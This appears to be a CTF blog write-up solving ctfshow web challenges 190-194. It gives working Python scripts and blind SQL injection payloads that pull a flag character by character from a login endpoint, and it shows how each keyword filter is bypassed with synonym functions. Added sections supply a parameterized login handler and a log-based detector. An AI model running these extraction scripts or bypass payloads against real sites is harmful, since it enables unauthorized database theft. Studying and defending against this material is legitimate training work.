Boolean-based blind SQL injection: web入门 190-194

Basic script

import requests

url = 'http://9980403b-660a-4aa7-90a0-c791e0e00ca6.challenge.ctf.show/api/index.php'
result = ''
i = 0
while True:
    i = i + 1
    # binary search the printable ASCII range for the i-th character of the flag
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2
        data = {
            "username": f"admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
            "password": "1"
        }
        r = requests.post(url, data=data).text

        # the JSON body escapes "密码错误" (wrong password) as \u5bc6\u7801\u9519\u8bef;
        # that message appears only when the injected condition is true
        if '\\u5bc6\\u7801\\u9519\\u8bef' in r:
            low = mid + 1
        else:
            high = mid
    # ascii('') is 0, so past the end of the flag low never moves off 32
    if low != 32:
        result += chr(low)
    else:
        break
    print(result)
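The script above depends on two things: the username is pasted into the SQL text, and the endpoint answers with a distinguishable message ("密码错误") exactly when the injected condition is true. The following is an added example, not part of the original writeup or the challenge code: a login handler in Python with an in-memory sqlite3 table (an assumption, standing in for the challenge's MySQL backend) that removes both halves of that oracle. The username is a bound parameter, so the page's own payloads are compared as literal strings and match no row; every failure path returns the same message and does the same amount of hashing work. The user table, password and payload list are constructed sample input.

```python
import hashlib
import hmac
import secrets
import sqlite3

LOGIN_FAILED = "invalid username or password"  # one message for every failure path


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 100_000).hex()


def add_user(conn, username, password):
    salt = secrets.token_hex(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (username, salt, _hash(password, salt)))


def make_db():
    # constructed in-memory user table (assumption: stands in for the challenge backend)
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt TEXT, pw_hash TEXT)")
    add_user(conn, "admin", "correct horse battery staple")
    return conn


def user_exists(conn, username):
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def login(conn, username, password):
    # bound parameter: the username is data, never part of the SQL text
    row = conn.execute("SELECT salt, pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        # burn the same work as a real check so timing does not reveal whether the user exists
        _hash(password, "0" * 32)
        return LOGIN_FAILED
    salt, pw_hash = row
    if not hmac.compare_digest(_hash(password, salt), pw_hash):
        return LOGIN_FAILED
    return "ok"


# the payload shapes from this page's scripts with i/mid/j/k filled in (constructed sample input)
PAGE_PAYLOADS = [
    "admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),1,1))>79,1,0)#",
    "admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),1,1))>79,1,0)#",
    "0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),1,1)='c',1,0)#",
    "0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),1,1)='c',1,0)#",
]


if __name__ == "__main__":
    conn = make_db()
    for payload in PAGE_PAYLOADS:
        # identical response whether the username is unknown, injected, or the password is wrong
        print(login(conn, payload, "1") == login(conn, "admin", "wrong") == LOGIN_FAILED)
```

With the parameter bound, `user_exists(conn, payload)` is False for every payload: the quote and the `#` never reach the SQL parser, so there is no condition to evaluate and nothing for the binary search to measure.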

Filter 1:

if(preg_match('/file|into|ascii/i', $username)){

Bypass: use ord in place of ascii

data = {
    "username": f"admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
    "password": "1"
}

Filter 2:

if(preg_match('/file|into|ascii|ord|hex/i', $username)){

Bypass: compare each character directly against a dictionary

import requests

url = "http://128f6cc0-3428-4086-8f43-384bac13bae8.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
    # try every candidate character for position j until the true-branch message comes back
    for k in dic:
        data = {
            'username': f"0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),{j},1)='{k}',1,0)#",
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            out += k
            print(out)
            break

This method also solves the first two challenges directly, but it is a bit slower.

Filter 3:

if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){

Bypass: use mid in place of the newly filtered substr; left and right also work

data = {
    'username': f"0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),{j},1)='{k}',1,0)#",
    'password': '1'
}

Note that the table name changes here (ctfshow_flxg instead of ctfshow_fl0g).

Filter 4:

if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){

Bypass: lpad and rpad; mid also still works, as in the previous one
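Each filter above blocks function names, and each is beaten by a synonym (ord, mid, left, right, lpad, rpad). The following is an added example from the detection side, not part of the original writeup: a log scanner in Python that flags these requests by their shape rather than by keyword (a quote closing the string literal followed by a boolean operator, a subquery, or a trailing comment), and separately by the volume of failed logins with ever-changing usernames that a character-by-character extraction produces. The log format, IP addresses and lines are constructed; the usernames from 203.0.113.10 are the page's own payload shapes with i/mid/j/k filled in.

```python
import re
from collections import defaultdict

# Constructed access-log excerpt (not from the page): client_ip "username" OUTCOME per line.
SAMPLE_LOG = """\
203.0.113.10 "admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),1,1))>79,1,0)#" FAIL
203.0.113.10 "admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),1,1))>103,1,0)#" FAIL
203.0.113.10 "admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),2,1))>91,1,0)#" FAIL
203.0.113.10 "0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),3,1)='t',1,0)#" FAIL
203.0.113.10 "0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),4,1)='f',1,0)#" FAIL
198.51.100.7 "alice" FAIL
198.51.100.7 "alice" OK
198.51.100.7 "d'angelo" OK
"""

LINE_RE = re.compile(r'^(\S+) "(.*)" (OK|FAIL)$')

# Shape-based indicator. None of these alternatives depend on which extraction function
# (ascii/ord/substr/mid/left/right/lpad/...) the payload uses, which is exactly what the
# keyword blacklists above keep losing to.
INJECTION_SHAPE = re.compile(
    r"'\s*(?:and|or)\s"        # admin' and ...  (trailing whitespace required so names like d'or pass)
    r"|'\s*(?:\|\||&&)"        # 0'|| ...
    r"|\(\s*select\b"          # (select group_concat(...)
    r"|(?:#|--\s)\s*$",        # trailing comment swallowing the rest of the query
    re.IGNORECASE,
)


def is_injection_shaped(username):
    return INJECTION_SHAPE.search(username) is not None


def parse_log(text):
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append((m.group(1), m.group(2), m.group(3) == "OK"))
    return records


def summarize(records):
    stats = defaultdict(lambda: {"attempts": 0, "failures": 0, "injected": 0, "usernames": set()})
    for ip, username, ok in records:
        s = stats[ip]
        s["attempts"] += 1
        s["failures"] += 0 if ok else 1
        s["injected"] += int(is_injection_shaped(username))
        s["usernames"].add(username)
    return stats


def suspicious_ips(stats, min_failures=20, min_injected=1):
    """Two independent signals: payload shape, or the volume of failed logins with
    ever-changing usernames that a binary search needs (about 7 requests per character)."""
    flagged = []
    for ip, s in stats.items():
        volumetric = s["failures"] >= min_failures and len(s["usernames"]) >= min_failures
        if s["injected"] >= min_injected or volumetric:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    stats = summarize(parse_log(SAMPLE_LOG))
    for ip in suspicious_ips(stats):
        print(ip, stats[ip]["injected"], "injection-shaped usernames,", stats[ip]["failures"], "failures")
```

The volumetric threshold is the more robust signal in practice: a single extracted flag of 40 characters costs the binary-search script several hundred failed logins from one source, all with distinct usernames, whatever function names the payload happens to use.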

Posted 2024-12-07 16:45 by Govced